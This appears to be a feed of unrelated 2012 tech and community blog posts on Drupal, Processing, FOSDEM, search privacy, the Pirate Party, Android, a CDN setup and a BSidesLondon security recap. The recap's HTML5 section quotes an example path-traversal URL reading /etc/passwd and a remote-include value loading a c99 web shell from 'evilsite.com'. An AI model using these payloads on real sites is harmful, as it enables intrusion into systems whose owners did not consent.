At DrupalCon Denver, I announced the need for a strong focus on Drupal's authoring experience in my State of Drupal presentation. During my core conversation later in the week, I announced the creation of a Drupal 7 distribution named "Spark" (formerly code-named "Phoenix"). The goal of Spark is to act as an incubator for Drupal 8 authoring experience improvements that can be tested in the field.

I hope for Spark to provide a "safe space" to prototype cutting-edge interface design and to build excellent content tools that are comparable with the experience of proprietary alternatives. While not a final list, some initial thinking around the features we want to experiment with is:

• Inline editing and drag-and-drop content layout tools ("true" WYSIWYG)
• Enhanced content creation: auto-save, save as draft and more
• Useful dashboards for content creators
• Mobile content authoring and administration support

The vision behind the Spark distribution is to be "the Pressflow of Drupal authoring experience". Pressflow provided a "spoon" of Drupal 6 with various performance enhancements that made their way into Drupal 7 core while it was in development. The same improvements were made available to Drupal 6 users so they could easily be tested in the field. With Spark, we want to test authoring experience improvements in Drupal 7 on real sites with real users and real content. We also want to target the best improvements for inclusion into Drupal 8 core.

I'm excited to announce that Acquia will fund the Spark distribution. Core developers Gábor Hojtsy and Wim Leers will work on Spark full-time starting in late May. They will work along side Angie Byron (webhchick), Alex Bronstein (effulgentsia), myself and other members at Acquia. While we have some promising candidates so far, Acquia is still seeking applicants to join the Spark team (with a strong preference to candidates located in or willing to move to the Boston area):

• Drupal UX Interaction Designer, who can conceptualize and prototype cutting-edge interface design.
• Senior Front-End Engineer, who eats, sleeps, and breaths JavaScript and jQuery (Drupal experience optional).

The Spark team will collaborate with the Drupal usability and the core development teams.

Bruxelles le 3 mai, Processing depuis Proce55ing

Julien Deswaef

Le jeudi 3 mai 2012, aux Jeudis du Libre de Bruxelles il sera question de création multimédia.

• Le sujet de cette séance : Processing depuis Proce55ing - println(« Hello World, I’m an artist. »);
  
• Thématique : création multimédia
  
• L’animateur conférencier : Julien Deswaef (Site perso / @xuv)
• Lieu de cette séance : Betagroup Coworking Brussels at ICAB Business & Technology Incubator - 4 rue des pères blancs – 1040 Bruxelles (cf. ce plan sur le site d’Openstreetmap).
• Horaires: de 19h à 21h, suivi d’un restaurant dans le quartier.

-> S’inscrire <-

println(« Hello World, I’m an artist. »);

Processing

Processing est un outil destiné aux artistes qui désirent se familiariser avec le code comme outil de création. Que l’on soit débutant ou programmeur confirmé, P5 (pour les intimes) offre une large palette d’outils permettant de développer des applications multimédias. À l’aube de son passage à la version 2.0, Julien Deswaef vous propose de plonger dans la communauté bigarrée qui l’entoure, depuis ses origines jusqu’au derniers développements. Il y aura, dans le désordre, des lignes de code, des anecdotes, des exemples, des grands noms, des librairies étranges,… le tout saucé de son expérience personnelle. On fera le tour de Processing comme on fait le tour d’internet…, en commençant par le point.

Une création réalisée avec Processing

Julien Deswaef

Julien Deswaef, artiste multimédia, tant actif dans les espaces de l’image que dans ceux du code, il présente cette capacité de transformer des «idées plastiques» en réalités numériques. Il collabore régulièrement avec des artistes tant dans le monde du spectacle, de la musique que des arts plastiques. Engagé dans le logiciel libre comme principe éthique, il assure avec pertinence la liaison entre les arts plastiques, le monde des images contemporaines de l’événementiel et les aspects les plus pointus en recherche numérique.

Site: http://xuv.be
Twitter: @xuv

Affiche pour les journées du libre organisées par le BxLUG - l'affiche contient le code qui a servi à la générer.

TODO: blogpost schrijven over
Borderlands, Star Trek Online, Star Wars The Old Republic, Starcraft 2, Borderlands, Alien Swarm, Left 4 Dead 2, Forsaken World

Zet 5 thirty-somethings met hun pc op een zolder voorzien van voldoende stopcontacten, een breedbandaansluiting en een goed gevulde ijskast, en je hebt de ingrediënten voor een LAN-party. Gastheer Erik had mij voorzien van een deftige gaming pc, want op een vorige LAN-party werd mijn pc vergeleken met een voeding. (TODO: foto invoegen)

Bugtracker! I meant to say "bugtracker", I swear!

So, the oh so popular and useful Packman project finally has a proper bugtracker, how awesome is that? Yes, truckloads of awesome. More seriously, it was about time and I finally just decided to do it.

From now on, please use our bugtracker to submit bugs, package requests, etc..., rather than using the mailing-list, although the latter is still fine for discussions and such, obviously.

Using a bugtracker will make it a lot easier for everyone to keep up with what needs to be done, for the packagers to pick things to do when they're bored (hah! right... I had to look up that word in the dictionary), and to make it clear once more that we definitely need more packagers to join and help out.

One needs to create a user account to be able to file a bug/request, but that's quick and doesn't involve any pain. We cannot use openSUSE accounts (as on .opensuse.org), sadly.

In case you didn't notice from the links above, the URL of the Packman bugtracker is https://bugs.links2linux.org.

Finally I found the time to “develop” my Perl dev-room @ FOSDEM 2012 pictures (convert from camera RAW files to jpg). It was a very nice event. If you missed the Perl dev-room in the past year, you should really visit us in 2013. Or even better, give a talk.

In the pictures above you see Nicholas talking about Moose. He forgot his mac-VGA adaptor (ahum) so he ended up writing code on the blackboard (“the loudest syntax checker on earth”). Marc mixed some Haskell in his talk while Flavio showed some Javascript-powered Perl. Clément presented a Perl SSO solution and Erik showed us a open source accounting solution. Stefan introduced the PerlCommerce platform, while Ævar (a famous guy being the most mentioned name in Programming Perl, 4th ed!) talks about git-deploy (or rather git-undeploy ). Marius explained the marriage of Moose and MemCached.

As the organizer of the Perl dev-room, I had to attend to a few things during the talks. My excuses for not taking pictures of Mark’s and Guillaume’s talk (I was able to attend most of it, though). Sadly,  I didn’t had the time to photograph our fabulous Perl stand (although I have some pictures from last year): Wendy, Liz, Eric and all the other volunteers did a great job.

Thank you for a successful Perl FOSDEM presence.

The Program was as follows:

In the late 90s, google became popular for one reason: because they had a no-nonsense frontpage that loaded quickly and didn't try to play with your mind. Well, at least that was my motivation for switching. The fact that they were using a revolutionary new search algorithm which changed the way you search the web had nothing to do with it, but was a nice extra.

Over the years, that small hand-written frontpage has morphed into something else. A behind-the-scenes look at the page shows that it's no longer the hand-written simple form of old, but something horrible that went through a minifier (read: obfuscator). Even so, a quick check against the Internet Wayback machine shows that the size of that page has increased twenty-fold, which is a lot. But I could live with that, since at least it looked superficially similar.

Recently, however, they've changed their frontpage so that search-as-you-type is enabled by default. Switching that off requires you to log in. So, you have a choice between giving up your privacy by logging in before you enter a search term, or by having everything you type, including any typos and stuff you may not have confirmed yet, be sent over to a data center god knows where. Additionally, at the first character you type, the front page switches away to the results page, causing me to go "uh?!?" as I try to find where they moved my cursor to. This is annoying.

Duckduckgo doesn't do these things; and since they also don't do things like combining my typing skills, phone contact list, calendar, and chat history to figure out that I might be interested in a date, I'm a lot more comfortable using them.

So a few days ago, I decided to switch my default search engine in chromium to duckduckgo. It still feels a bit weird, to be using a browser written by one search engine to search something on another; but all in all, it's been a positive experience. And the fact that wikipedia results are shown first, followed by (maybe) one ad, followed by other search results, is refreshing.

We'll see how far this gets us.

Le Parti Pirate est crédité, selon les sondages, de 13% d'intentions de vote en Allemagne mais, en France, ne serait connu que de 12% des internautes !

Si vous même faites partie des 88%, je vous invite chaleureusement à prendre 10 min de votre temps pour une session de rattrapage.

Mais, entre nous, comment expliquer une telle disparité entre deux pays voisins ? Et, surtout, comment y remédier ?

Syndrome de Robinson

N'importe qui peut créer un parti politique et l'appeler Parti Pirate. À l'échelle d'un pays, la légitimité des fondateurs est donc absolument nulle. Un groupe peut décider, dans son garage, de devenir le Parti Pirate du Zimbabwe.

Une fois le travail administratif de création fait, les dirigeants doivent rester lucides. Peut-être ne sont-ils pas les meilleurs pour l'étape suivante, à savoir la popularisation du mouvement ?

Laissez leur chance aux nouveaux arrivants, soyez ouverts !

Syndrome d'Iznogoud

Comme n'importe quelle structure, le Parti Pirate est soumis à la corruption du pouvoir. Être président ou premier-secrétaire est un honneur. Il est difficile de renoncer à un poste et presque impossible de reconnaître ses erreurs. Le réflexe du pouvoir devient alors de cacher, de garder confidentiel au nom « du bien commun ».

La philosophie du Parti Pirate est simple pour lutter contre les dérives du pouvoir: transparence totale de la structure et encouragement à reconnaître ses erreurs. Rick Falkvinge, fondateur du Parti Pirate Suédois, est célèbre pour être un des premiers leaders politiques à reconnaître rapidement et pleinement ses fautes.

Mais encore faut-il que votre Parti Pirate local applique ces règles honnêtement et sans les traditionnels « Oui mais bon, là c'est une exception ! ».

Arrêtez de faire l'autruche ! Dans un conflit, personne n'est jamais complètement innocent.

Syndrome de la paix au proche-orient

Chaque novice qui se lance en politique passe des nuits à établir des programmes complets pour changer le monde, passant de la paix au proche-orient à la sauvegarde du mode de vie des papous. Une fois cet illisible et exhaustif programme prêt, on écrase le joint dans le cendrier et on rend le manifeste public, espérant convaincre le monde.

Résultat garanti: quelques poussières de pourcent de gens qui se sont trompé de ligne en votant.

Se considérer le centre du monde et croire détenir la vérité sont les béquilles de la sous-politique de comptoir. Pour le parti pirate, la politique devrait être un mouvement de bas en haut. La force du Parti Pirate se mesure à celle de ses groupes locaux, régionaux. Ceux qui vont vraiment à la rencontre des gens. Ceux qui sont les gens.

Une relation de confiance s'établit en premier lieu à l'échelle d'une ville. C'est dans les élections communales et locales que le Parti Pirate doit d'abord se faire entendre. Et, rien qu'à ce niveau, il y a tant à faire !

Syndrome de l'usine à gaz

La tendance est également forte de tout faire, de tout prévoir, de sur-structurer. Un nouveau parti de vingt personne se dotera d'un comité national, d'un bureau politique, d'un sous-secrétariat au calibrage des œufs d'autruche^[1], etc.

Des règles complexes viendront gérer les relations entre ces vingts personnes. Si établir ces règles permet de se sentir important, c'est tout simplement contreproductif quand l'objectif est de devenir populaire.

La philosophie du Parti Pirate est pourtant simple: pas de règles tant que ça ne se révèle pas absolument nécessaire. Laissez les personnes et les groupes fonctionner à la manière qui leur convient le mieux. Ne vous inspirez pas des partis politiques existants mais plutôt des projets opensource, de wikipedia.

Si un problème se révèle à un niveau, demandez un arbitrage à un niveau supérieur là où, probablement, il y a aura du recul et peu d'investissement émotionnel.

Syndrome de la gau-gauche

Dès que deux personnes discutent d'une idée globale, il est probable qu'à un moment ou un autre, elles tombent en désaccord sur un point de détail. À gauche, il est de tradition que chacun fonde son propre parti.

Il est indispensable que chaque Pirate, du plus novice au plus influent, comprenne que, faire de la politique, c'est surtout faire des compromis.

Le Parti Pirate a des valeurs fondamentales. Adhérer au parti représente une acceptation de ces valeurs. Par contre, il est essentiel de se dire que vous ne serez pas toujours en accord avec certaines décisions du Parti.

Souvenez-vous: il est plus important de défendre les valeurs communes que de se disputer publiquement. Un vrai pirate est capable de compromis, de remise en question.

Les pirates ne sont pas nombreux, leur seule force réside dans leur unité.

Syndrome Laurent Louis

Un autre problème auquel est confronté un parti naissant est le manque de cadres expérimentés. La tendance va être à recruter le plus large possible afin de remplir les listes électorales.

En Belgique, un nouveau parti, le Parti Populaire, a eu un élu en 2010. Il n'a pas fallu longtemps pour se rendre compte que l'élu en question n'avait pas toutes ses frites dans le même sachet et qu'il soit éjecté de son parti, privant ce dernier d'élus et donc de subsides. Quand à Laurent Louis, si il a amusé la galerie un moment, il est récemment tombé dans le grand n'importe quoi.

Ce genre d'individus peut tout à fait apparaitre au Parti Pirate. C'est pourquoi le travail de fond doit impérativement être fait par les groupes locaux. Pour gagner en responsabilité, un pirate doit si possible faire ses preuves localement puis avec une importance croissante.

Les listes doivent être déterminée collégialement et doivent avoir toute la confiance des membres.

Aux sympathisants et aux candidats, présents et à venir, du Parti Pirate

Plutôt que de critiquer un parti national, ne tergiversez pas: rejoignez ou fondez votre structure locale. Mettez vos idées en pratique et voyez ce que ça devient.

Si vous êtes candidats Parti Pirate, souvenez-vous que vous êtes avant tout porteur d'une nouvelle idée et que, cette idée est plus importante pour les électeurs que toutes vos petites histoires.

Engagez-vous à garder un ton respectueux en public (y compris sur internet), à ne pas répondre émotionnellement, à oublier vos querelles et à reconnaitre pleinement vos erreurs.

Souvenez-vous que vous vous engagez pour vous mettre au service de la population, que si vous êtes élus, vos besoins et vos avis personnels passeront au second plan.

Ne prenez pas le pouvoir, donnez-le à vos électeurs !

Images par Bart Heird, Ryan Ruppe, Lau Sew, Eric Peacock and Eva Rinaldi

Last week I flashed my Samsung Galaxy S II with the official Android 4 firmware from Samsung. Here’s some information and semi-random thoughts about the upgrade and my Ice Cream Sandwich on Samsung-experience so far.

1. About the upgrade:
   • I didn’t use KIES, the official Samsung upgrade utility as it claimed there was no upgrade.
   • Instead I downloaded the ICS image for the Netherlands from sammobile.com and followed the installation procedure as described on the forum there.
   • Samsung allows you to flash, no need to crack your bootloader, flash a new recovery image or anything similarly scary.
   • Flashing the official firmware does not overwrite data or apps, you don’t loose a thing.
   • After booting into the new firmware, your apps are first and foremost optimized for ICS.
   • Battery usage was very high after the upgrade, with the Email app (which connects to an Exchange server) using a lot of CPU. I rebooted and the problem went away.
2. What Ice Cream Samsung is like:
   • Battery life actually seems a bit better than with the Gingerbread-based firmware.
   • Ice Cream Sandwich seems slightly faster as well, more responsive.
   • ICS isn’t all that different, from a user interface point of view. Some small tweaks and usability improvements, but nothing major.
   • Face unlock (having Android unlock your phone after recognizing your face) is a nice gadget, but it’s of little use if you value security.
   • More interesting, from a security point of view, are “encrypt device” and “encrypt SD card”. Should give that a try.
   • The data usage app is really great, allowing you to monitor and manage data usage for the entire device and on a per-app basis. “Data Usage” is, as far as I’m concerned, one of the hidden treasures in ICS!
3. Tailoring ICS to my liking:
   • I’m not a fan of Samsung’s TouchWiz, which also features in their ICS implementation, so I don’t use it.
   • At first I installed Nova, an ICS-only launcher, but I wasn’t blown away, so I reverted to good old ADW.
   • I rooted the phone with CF-root to be able to install SetCPU.
   • SetCPU, which I had previously used on my HTC, seemed to work all right at first, but it sometimes put my phone into a deep sleep during phone calls or when idle, with nothing but a forced reboot to wake it up. I uninstalled SetCPU (and am still looking for a similar tool to save battery mainly).
   • I also installed AdFree Android, which adds known ad-domains to your hosts-file, having them point to localhost. Only for rooted phones, but it works like a charm. More privacy and better battery-life will be yours!

So I’m good, for now. But I’m sure I’ll be very tempted when Cyanogenmod 9 for the Galaxy SII comes out. Go TeamHacksung!

Possibly related twitterless twaddle:

• Feeling the Ubuntu-upgrade pain
• Fix Samsung ICS Exchange connection errors
• The Magic’s gone, enter Samsung Galaxy S II

BSidesLondon Track 1

I’m back from a small trip to London where is happening some kind of a “security marathon” this week! In parallel to InfoSecurity Europe 2012, several “alternative” events where organized in the same area. However I did not visited InfoSecurity. I was present at the Benelux edition a few weeks ago and saw enough vendors/products (ties overflow). After a nice ride under the sea and having dropped my luggage at the hotel, I reached my first step: the Information Security Blogger Meetup. The pub was fully dedicated to people from InfoSecurity (sponsored by Firemon) and a space was reserved to the bloggers but not so many people present (although 40 people registered). It was a bit disappointing but, anyway, it was a good opportunity to meet Andrew & Kelly Hay and Javvad Malik. Thanks for the sponsor for the open bar! By the way, I missed Brian Honan with a bow tie!

The next step was a few streets far away: the 44Café and DC4420 were organized in another pub, the “Troubadour”. There was much more people and an atmosphere close to the one of real security conferences (read:  ”beers and talks”). I came late and I was only able to watch the Adam Laurie‘s talk about the security of RF communications (based on  433Mhz frequency). More and more gadgets with RF interfaces, are found in our houses. A good example are the remote controls for electric devices (to turn them off/on via your sofa or bed). Most of those devices are made in China and do not implement any security control at all. Adam performed a nice demo. He sniffed the original RF signal using a specific dongle and the “rfcap” tool. The captured .wav file can be analyzed and replayed using the same device. And he successfully powered off/on the LED lamp on the stage. Awesome! Of course, this has a limited impact (a very low operational range) but… Once the DC4420 over, I went to an Italian restaurant with friends to continue discussions about security.

After a short night, let’s commute to the next step: BSidesLondon! This was the second edition. I won’t come back on the history of BSides conferences, here is a reminder. The conference moved to a new venue, the Barbican center, a very nice place!

The Barbican Center Garden

First talk of the day was the one of Robin Wood (@digininja) about “Breaking in to security“. A few weeks ago, Robin asked to Infosec professional to answer a few questions about their career (via an online survey). The goal was to produce a definitive answer to people frequently asking “How to start a career in information security?“, “What programming language learn to become a pentester?” or “Which certification should I get?” First, it seems that people are not aware of the reality and media report often a bad idea of the “hackers”:

Infosec Job Reality

Some stats extracted from the survey:

• 43% of people who answered are active in information security for more than seven years
• Interesting job types: 33% reported being “log analyst” and 25% busy with “incident response”
• Do you need to be a programmer to pen test: no but it helps (62%), yes (26%). The goal of programs is to automate boring tasks.
• Which language are preferred? Top-3: python, bash, ruby
• Which Certs are useful? SANS/GIAC, CISSP, Offensive security (PWB, AWE, …)
• Is attending conference important: YES (88%)
• Which con? All of them had a mention

Then a live interview (real case study) was performed with Wicked Clown. Don’t forget that security involves also dealing with people, public speaking, negotiation skills, writing report (boring ok!) and networking. Security conferences are a must to attend even if they are often bad for your liver! Have also a look at mailing lists, podcasts, forums. Don’t be afraid to ask questions and to learn. Today it’s easy to build a lab at home using virtualization.  As a conclusion to this talk, only one word is important: “passion”! Remember: It cannot only be “a job”! Robin’s slides are already available here.

The second talk was about Social Engineering: “What is it & how is it done?” by Ian Maxted (@TheJeffVader). He started the presentation with an history of social engineering. Did you know that it started with a book published in 1946 (name). Then he reviewed several techniques to collect sensitive information. Classic places are smoking areas or coffee machine in companies or pubs! Of course, with the new “Y” generation, social networks are a great place to search for useful details to contact further attacks. Ian showed some examples of fake websites. Note that such interfaces are quite easy to build, even by script kiddies but it’s sometimes not easy to persuade the victim to visit them. That’s what makes social engineering interesting. The goal is to establish relationships! Great introduction!

Social Engineering

Next, the security of Windows Phone 7 was analyzed by David Rook (@securityninja). As other systems, Windows Phone 7 will suffer of security issues. Why? Today, 31% of mobile devices are smartphones. And those devices are really useful when you install apps. Remember the slogan: “There is an app for that!“. And apps introduce vulnerabilities. The market share of Windows Phone 7 is today only 1.9% but it will grow in the coming years. After this introduction, David explained how apps are developed and are running. First, if you are a .Net developer, you are already a Windows Phone 7 develop! .Net is also used but in a compact framework for resource constrained devices. The applications run in a “CLR” (“Common Language Runtime” – some kind of Java VM) and cannot access restricted code. The security model is the following:

• Chambers concept to enforce app isolation and least privilege
• The chambers provide a security boundary to restrict the apps
• For chambers and apps runs in one of them
• 3 chambers have fixed permission sets
• 4th chamber is capabilities based

An interesting tool: Windows Phone App Analyzer 1.0

Note that all apps must be signed by Microsoft after reviewing process before being published on the Microsoft market. For the rest, the same features are used: application sandboxing, isolated storage. Security remains the same but think more about the root causes like input/output validation, error handling, etc. Robin’s Top-3 is: secure storage, authentication & access and privacy. Nothing really new, the same best practices must be implemented: Never store data locally if not needed. About encryption, Windows Phone 7 allows to encrypt data & databases, do it!

SecurityNinja & Windows Phone 7

The next talk was not schedule (planning change?) but it was really interesting. Paco Hope talked about “randomness”. Where are random numbers used? In many fields: games (poker), gambling, lottery, casino but also in more “technical application” like SSL, filename generators etc. What’s important with randomness?

• The uniformity (no pattern)
• The forward security (can’t know previous values)
• The backward security (can’t know future values)

Developing a good random generator is not easy (as seen on xkcd.com). Plenty of mistakes can be done making the generator predictable (even if sometimes it’s not easy at all). Random numbers can be generated by hardware solutions (PCI cards, built-in chips on motherboards or USB dongle) but they also have vulnerabilities: environmental (temperature, voltage). And the throughput remains critical in some applications. About software solutions, common problems are where to gt the entropy, how often reseed occur, the period and seed size. Vulnerabilities are a disclosed seed or attacking the entropy sources. Some example of bad implementation: using the system time or a process ID. Paco showed examples of algorithm to shuffle cards. Very interesting!

Paco Hope about Randomness

Let’s continue with a good talk about HTML5 by Robert McArdle (@robmcardle). The next version of the HTML is more and more used and tested by web developers. It will introduce cool features but cool features sometimes say… security issues! The talk was divided in three parts: the good, the bad and the “???”

What’s cool with HTML5?

• HTML5 Canvas – 2D & 3D easy to make nice graphics and add more interaction with users. A good example is Quake2 demo in HTML5
• Embedding videos in pages is very easy as wall as the interaction with the users (pause, CSS)
• Geolocalisation (mainly on mobile devices) is possible in a few lines of codes
• Drag & Drop!
• Web notifications

But what’s bad?

• XSS attackes remain valid with new tags (“<video>”)
• XMLHTTPRequest() extends the local file inclusing problem! Instead of “http://site.com&page=../../../../etc/passwd“, we could see “page=http://www.evilsite.com/c99shell.php“
• Based on JavaScript, obfuscation is easy and not detected by AV’s)
• Web notification coupled with social engineering could be evil! (pop-ups looking like the operating system ones)

Finally, the ???: A nice demo of a BitB (“BotNets in the Browser“) attack. Based on HTML5 code, it’s possible to perform DDoS attacks, to send spam, to geolocate the victim, grab information about his system. Awesome (depending on the point of view). Keep an eye on HTML5! For sure, it will become a nice platform to conduct attacks. Have a look at html5security.org for updates on this topic.

HTML5 Attacks

After the lunch, another talk about social engineering by Gavin Ewan (@jac0byterebel). “A salesman’s guide to social engineering” was really complimentary to the first one presented in the morning. The Gavin’s definition of social engineering is: “Hacking the human mind, bypassing the human IDS”. How? There are several channels: Face 2 face, telephone or online . Then Gavin focused on a comparison between a salesman and a social engineer. If you look close to their methods, they are very close to each other! Both recognize that each target (sale/attack) is different, they can play different roles, they use a variety of questioning techniques and recognize that “no” does not mean “no”. A really nice talk given with a Scottish humor! Great.

Gavin Ewan about Social Engineering

Then, the security of SCADA environments was reviewed by Amol Sarwate (@amolsarwate). After a review of the components used in a SCADA environment (I/O – remote – communication – master), Amol reviewed the threats that affect each components. Two protocols used in SCADA environment were reviewed: Modbus and DNP 3.0 (over TCP).  (Did you know that Wireshark was able to decode them?). The main issues with those protocols: they don’t follow the CIA principle (no authentication, no encryption). What are common issues within SCADA environments?

• HMI (Human Machine Interfaces) are sometimes connected on corporate network or Internet
• Shared or simple passwords are used (what’s new in this world?)
• No patching policy and Windows systems
• Not restarted for years (will it boot again?)
• System long life cycle (often they are installed for a decade)
• Outdated techs
• SCADA administrators are not system administrators.

Note that no only SCADA systems (in industrial environments) are to blame but also medical systems (ex: imagery systems in hospitals). More precisely, it’s not the systems themselves (after all they do the job they have been developed for) to blame but more the way they are deployed and managed. To close the presentation, Amol presented the tool developed by Qualys: scandascan.pl (The first release if available here). It scans networks for SCADA devices responding to Modbus or DNP3. If you are looking for online (publicly available) SCADA devices, Shodan can be also a great tool.

Security of SCADA Environments

My last choice was the presentation of Abraham Aranguren(@7a_) about his tool called “owtf” which stands for “Offensive Web Testing Framework“. After a short introduction why and how web app testing is important, Abraham explained his tool with multiple demos. Testing web applications is important. Did you know that 32 out of 66 OWASp tests can be performed legally (depending on the local laws – take care!). Abraham’s tool is available here. Unfortunately, I was not able to attend the end of his presentation as well as the last track due to travel constraints.

What else? In parallel to the two tracks, there was a third one left open for last-minute initiatives (with 15 minutes slots). I attended some of them which where interesting. Security researchers are doing a great job. As said Robin during his talk: security conferences and networking is a key point, so I did. This second edition of BSidesLondon was a great opportunity to meet new (and old) friends. Thanks to my new followers in Twitter. I think that London was never so full of infosec people! Kudos to the crew (especially to @geekchickuk!) and see you in 2013! May I already book my ticket?

It's Over!

 

Speed up your Drupal site with a CDN in a few minutes.

The fun part: it’s nice to learn how to make any Drupal site significantly faster in a few minutes. The profit part: faster websites lead to more users and more revenue.

This article covers the common case: you have a small to medium size (≤1M page views per month), without massive amounts of large images, you’re using Drupal 7¹ and you only want to spend a few euros or (U.S.) dollars per month on a CDN. (You already know what a CDN is, right?)
So, you want your Drupal site to be faster, only spend a few minutes doing so, don’t want to deal with infrastructure and want to keep the costs very minimal. You’ve come to the right place.

Also: don’t worry about the cost: this little experiment will only cost you a few cents.

We’ll be using Amazon CloudFront and my CDN module for Drupal — I hope you like it. I’ve tried to make it as easy to use as possible. It’s solid, it’s got unit tests where appropriate, it’s used by ±2,000 Drupal sites — http://economist.com and http://worldpressphoto.org amongst others.
My largest deployment is for http://driverpacks.net, where the total CDN bill for well over half a million page views per month is less than USD $10!

Part 1: Create an Amazon CloudFront Distribution with a Custom Origin

We’ll be using Amazon’s CloudFront CDN service. Why?
They’re reliable, have solid performance (though not the best), are affordable (though not the cheapest) and are continuously expanding (i.e. adding more Points of Presence) around the globe. In just the last six months, they added five new edge locations². So your site will automatically get faster in more locations around the globe, without paying more. Also see their list of edge locations or their map. Amazon is also cutting prices regularly (July 2011 was the last time). You’ll generally also never run into problems — after all, there are bigger fishes out there that help drive the infrastructure forward, you can just get an easy ride along.

You are of course free to use a different CDN, but then you’ll have to make sure you’re using an Origin Pull CDN.

So, go to https://aws.amazon.com/ and sign up for an account if you haven’t already. Go to the AWS Management Console and sign in. Go the CloudFront tab and click the “Create Distribution” in the top left corner.

A wizard modal window will pop up (on the first page of the wizard: “Distribution Type”), where you can choose between two types of origins³: Amazon S3 Origin and Custom Origin. Choose Custom Origin; this means Amazon CloudFront’s edge location servers will come to your Drupal site’s web server and retrieve the files it needs to serve to end users. You won’t have to deal with Amazon S3 at all.
In the Origin DNS Name field, enter the domain name of your Drupal site: www.yoursite.com. In my case, I entered wimleers.com (my site is accessible both with and without the www). Next: the Protocol Policy field. If your site is only accessible via HTTP and not via HTTPs, then just go with the default HTTP Only option. If your site supports https (or you want to support this in the future), then select Match Viewer. Finally, click “Continue”.

Now you’re on the second page of the wizard (“Distribution Details”). You don’t need to change anything here. Click “Continue” again. We’re now on the “Review” page of the wizard. Click “Create Distribution”. You should get a message stating “You have successfully created a CloudFront Distribution.” Great!

At the top of your CloudFront Management Console’s table of distributions, you should now see something like this:

Your newly created distribution’s status will remain at InProgress for a few more minutes, then it will change to Deployed. As soon as it is Deployed, we can actually use it.

If you have more special needs, consult Amazon’s documentation on creating distributions. More often than not, you won’t need that though.

Part 2: integrate your Drupal site with the CDN!

Download the CDN module for Drupal (version 2.5 or later). Install it like you install any other module. After the installation, go to admin/config/development/cdn (admin/settings/cdn on Drupal 6). There’s three tabs:

1. General
2. Details
3. Other

We’ll cover them one by one. Note that you can install the Advanced Help module to get more and better help (it’ll help you explore all features of the CDN module).

First tab: “General”

There’s really only one important setting here: the status of the CDN module. You can either disable it, enable it, or put it in testing mode, which is somewhere in between. In testing mode, none of your visitors will get files from the CDN; only users with the access files on CDN when in testing mode permission will get to see it. This is perfect to test whether the CDN integration is actually working correctly. So, for now, let’s put it in testing mode.

The second (and last) setting on this tab is the Display statistics setting. Users with the access per-page statistics permission will get to see, well, per-page statistics at the bottom of each page: “what percentage of files is served from a CDN”, and so on. Enable this for now, so you get to see the results for each page on your site.

Second tab: “Details”

At the top of this tab, there’s a Mode setting, which allows you to choose between Origin Pull and File Conveyor. Choose Origin Pull (the default).

Next, there are mode-specific settings. The most important one is the “CDN mapping” setting. Here we define which files are mapped to which CDN (in case you’re using multiple CDNs — or static file servers).
Go back to the CloudFront Management Console and copy the domain name of your CloudFront Distribution. In my case: d67something714.cloudfront.net. Now paste this into the “CDN mapping” setting, but prepend it with http://. So your CDN mapping is now set to http://d67something714.cloudfront.net. This will cause all files to be served from CloudFront.

Read the included Advanced Help documentation to see what else is possible (e.g. serve images from a different CDN or only serve CSS and JS from a CDN), but for us (and for http://wimleers.com), this CDN mapping will do.

Optional, but recommended: Far Future expiration

The last setting on the “Details” tab is the Far Future expiration checkbox. This single checkbox has the capability to make your site much faster than when you were just using a CDN without this setting enabled. It can also reduce your CDN bill significantly.

What does it do? Well, it ensures that all files are served from the CDN in the most optimal way possible: compressed (gzipped) whenever possible and with the most optimal HTTP headers. These HTTP headers tell your visitors’ browsers to cache files “forever”. The results: less requests to the CDN (reducing your bill), and hence an even faster site! Whenever the file changes, its URL is changed automatically, so that your visitors don’t continue using that old buggy JS or CSS file forever, but they get the new files immediately.

There’s a catch though: to be able to set these HTTP headers and automatically⁴ change file URLs to be unique, we have to serve the files through PHP (Drupal) instead of letting the web server take care of it… This has adverse performance effects: using PHP to serve static files is not efficient!
However, the CDN caches these files for long periods of time (CloudFront edge locations come back to the origin once every 24 hours, no matter what expiration date you configure), so in fact that’s just fine. Hence you should only enable this setting if you’re using a CDN or a reverse proxy such as Varnish. It won’t work when you’re using “your own CDN”, i.e. just a static file server such as nginx or lighttpd. It will work when you’re using the same web server for these alternative domains as you’re using for serving the actual Drupal site, but in that case, very long load times are the result.
Again: no worries, the CDN module checks this automatically for you. After you submit the “Details” form, you should see a status message that confirms everything is a-ok:

Once you’ve enabled the Far Future expiration setting, a new setting appears: Unique file identifier generation. This defines how each file’s unique file identifiers are generated. The default works fine for all sites, but for complex and/or high-traffic sites, you may want to fine-tune this.

Third tab: “Other”

We won’t go into the details of the various settings on this tab, but there’s only one we care about for the scope of this article: the CDN supports HTTPS setting. If your site is using HTTPS and you configured your CloudFront distribution’s Protocol Policy to Match Viewer, then you can enable this setting as well. Whenever your site is accessed through HTTPS, your files will still be served from the CDN, via HTTPS!

All done!

If you haven’t already, make sure you’ve enabled Drupal’s CSS aggregation, block caching and page caching. The CDN module automatically rewrites image URLs in blocks and nodes, but we don’t want that to happen on every page load if it’s not necessary — hence enable those caching layers.

By now, the status of your CloudFront distribution should have changed to “Deployed”. So let’s give this a try! The following screenshot was taken at http://wimleers.com/blog/facebook-week-12:

If everything is looking good after browsing through your website and confirming that the CDN integration is working correctly everywhere, head back to the “General” tab and change the status from Testing mode to Enabled. Now your site’s actual visitors will also get all files served from the CDN, so they should be experiencing a faster site! Definitely return visits should be significantly faster. Your status report should look similar to this:

Congratulations, your site is now accelerated by a CDN!

• Drupal
• CDN
• WPO
• performance

• Add new comment

Dear *,

Picture 1:

Imagine you have developed a successful web application built on traditional architecture which is visited by a consequent amount of users.

However, you are victim of you success, and more and more users are connected to you site.

Now, you are confronted to the overload of your application and your users tend to be unhappy due to the bad response time of your application.

Picture 2 :

So, in  order to fix this you decided to change your application a little bit and then add some cache to it.

During a certain period of time, that clever trick worked. But, you still had the same problem.

Picture 3 :

Well, you had then the idea to increase the number of Application Servers to resolve that problem.

Nonetheless, with that decision you had to complexity your application.  Nevermind, you had to increase the performance otherwise you were going to lose your customers.

Picture 4:

But the problem still remained and you are now convinced the bottleneck is related to you old heavy database.

So you have no other choice than buy another database licence and its annual maintenance fees.

The MAJOR problem here is that is very very expensive.

Picture 5 :

Anyway, you decide adding more databases is not your only option.
You finally decide to implement a data grid in your environment in order to fix that problem without exploding your allocated budget.

If you are interesting by the subject  then I am going to do a presentation/introduction about “JBoss Data Grid” in Belgium in April 2012.
If your company or you are based in BeNeLux and are interested by this presentation, just let me know and I will try to arrange a meeting for you.

N.B.: JBoss Data Grid 6 beta provides:

